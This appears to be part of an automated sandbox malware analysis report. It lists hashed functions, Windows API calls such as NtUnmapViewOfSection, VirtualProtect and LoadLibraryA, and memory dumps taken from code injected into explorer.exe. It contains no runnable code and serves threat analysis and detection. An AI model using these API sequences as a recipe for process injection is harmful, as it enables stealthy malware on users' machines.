                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                        • String ID:
                                                        • API String ID: 3827878703-0
                                                        • Opcode ID: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                                        • Instruction ID: 882ca4903ef036f6b5f5890f1cff92f57d062729b07f76d901994030c3102d93
                                                        • Opcode Fuzzy Hash: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                                        • Instruction Fuzzy Hash: 8731AF71744616AFCB68DF29D885BA6B7ECBF15314F14412CE8C6C7200E736E846CBA0
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(0008582C), ref: 00081839
                                                        • lstrlenW.KERNEL32 ref: 00081845
                                                        • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000818A9
                                                        • Sleep.KERNEL32(00007530), ref: 000818B4
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                        • String ID:
                                                        • API String ID: 2134730579-0
                                                        • Opcode ID: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                                        • Instruction ID: 7c053be448574412fdc363f5d5491aaf5b64503bb00f6c028054f82ac53ad905
                                                        • Opcode Fuzzy Hash: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                                        • Instruction Fuzzy Hash: 9201DB70510900EBE314B765EC1A5BE3EA9FF817017100028F0C19B262DE388D01DFA6
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,000811DD), ref: 000826DB
                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 000826ED
                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 00082700
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082716
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                        • String ID:
                                                        • API String ID: 331459951-0
                                                        • Opcode ID: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                                        • Instruction ID: 630fcc8948f4ad9a4a54ff0f26d7f5e2b88293ccb917313e272e05edaa6f4c2a
                                                        • Opcode Fuzzy Hash: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                                        • Instruction Fuzzy Hash: D0F0BE72806218FFAB20DFA1AD888EEBBBCFF05751B10026AE94093140D7358F009BA1
                                                        APIs
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 000817F3
                                                        • wsprintfW.USER32 ref: 0008181D
                                                        Strings
                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00081817
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                        • API String ID: 377395780-613334611
                                                        • Opcode ID: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                                        • Instruction ID: 471151813494080dcc102fe0f31ea5f83efc4e699d331606ea4c247a43dc96ce
                                                        • Opcode Fuzzy Hash: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                                        • Instruction Fuzzy Hash: B4F03072900128BADB14ABD99C458FFB2FCFF0CB02B00018AFA81E1181F67C5A50D3B5

                                                        Callgraph (rendered graphic, not reproduced): 83 functions, Function_000E1000 to Function_000EC14A, with the call edges listed in the report; the node with the most outgoing edges is Function_000E34C4

                                                        Control-flow Graph (rendered graphic, not reproduced): basic blocks e370c-e37de; calls NtUnmapViewOfSection and internal functions e1c6c, e1838, e34c4, e31ac, plus a recursive call to e370c
                                                        APIs
                                                        • NtUnmapViewOfSection.NTDLL ref: 000E378C
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.624520210.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_27_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                        • Instruction ID: 4f1156a7facc9e97d658a34bc3cb6b47269a29ccbf94109271c4d97308bcea68
                                                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                        • Instruction Fuzzy Hash: 7911EB746169494FFB6CFB79989D3B537E2FB14312F54402DE855C72A2DE39CA818700

                                                        Control-flow Graph (rendered graphic, not reproduced): basic blocks eb4a8-eb694; calls LoadLibraryA, VirtualProtect (twice) and internal function eb46a
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,7473604B), ref: 000EB5A7
                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 000EB651
                                                        • VirtualProtect.KERNELBASE ref: 000EB66F
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.624520210.00000000000EA000.00000040.80000000.00040000.00000000.sdmp, Offset: 000EA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_27_2_ea000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 895956442-0
                                                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                        • Instruction ID: f7358003556ff376e749192b7bc5dd04691651ad2956f887fb7b31e4195e77f6
                                                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                        • Instruction Fuzzy Hash: 35518A32754D9D4FCB24AA3E9CC43FAB7C1F755325B58063AC49AD3285E758C8468381

                                                        Control-flow Graph
                                                        • [Graph not rendered in text export] Basic blocks e34c4-e3707; API call in graph: SleepEx (block e36fc-e3707); subcalls to e1838, e1bf8, e1a88, e1c4c, e1860, e3394, e1cac, e1d04, e1d24, e1c6c, e19bc, e2a04
                                                        APIs
                                                          • Part of subcall function 000E1BF8: OpenFileMappingA.KERNEL32 ref: 000E1C0F
                                                          • Part of subcall function 000E1BF8: MapViewOfFile.KERNEL32 ref: 000E1C2E
                                                        • SysFreeMap.PGOCR ref: 000E36F7
                                                        • SleepEx.KERNEL32 ref: 000E3701
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.624520210.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_27_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$FreeMappingOpenSleepView
                                                        • String ID:
                                                        • API String ID: 4205437007-0
                                                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                        • Instruction ID: 761a8b7c1b817816f299ec55e78839af24da885bbda4d2937d8502c84ab9a70f
                                                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                        • Instruction Fuzzy Hash: F551A730208A488FDB59FF3AD85DAEA77E1EB94310F444619E45BD32A2DF38DA058781

                                                        Control-flow Graph
                                                        • [Graph not rendered in text export] Basic blocks e1bf8-e1c48; API calls in graph: OpenFileMappingA (block e1bf8-e1c18), MapViewOfFile (block e1c1a-e1c38)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.624520210.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_27_2_e1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MappingOpenView
                                                        • String ID:
                                                        • API String ID: 3439327939-0
                                                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                        • Instruction ID: 3271ea4ec32d42c6c59079bbb4174db076aefa67609a15f3021a0ff69cd5a82f
                                                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                        • Instruction Fuzzy Hash: 50F01234314F4D4FAB45EF7D9C9C135B7E1EBA8202744857A985AC6165EF34C8458711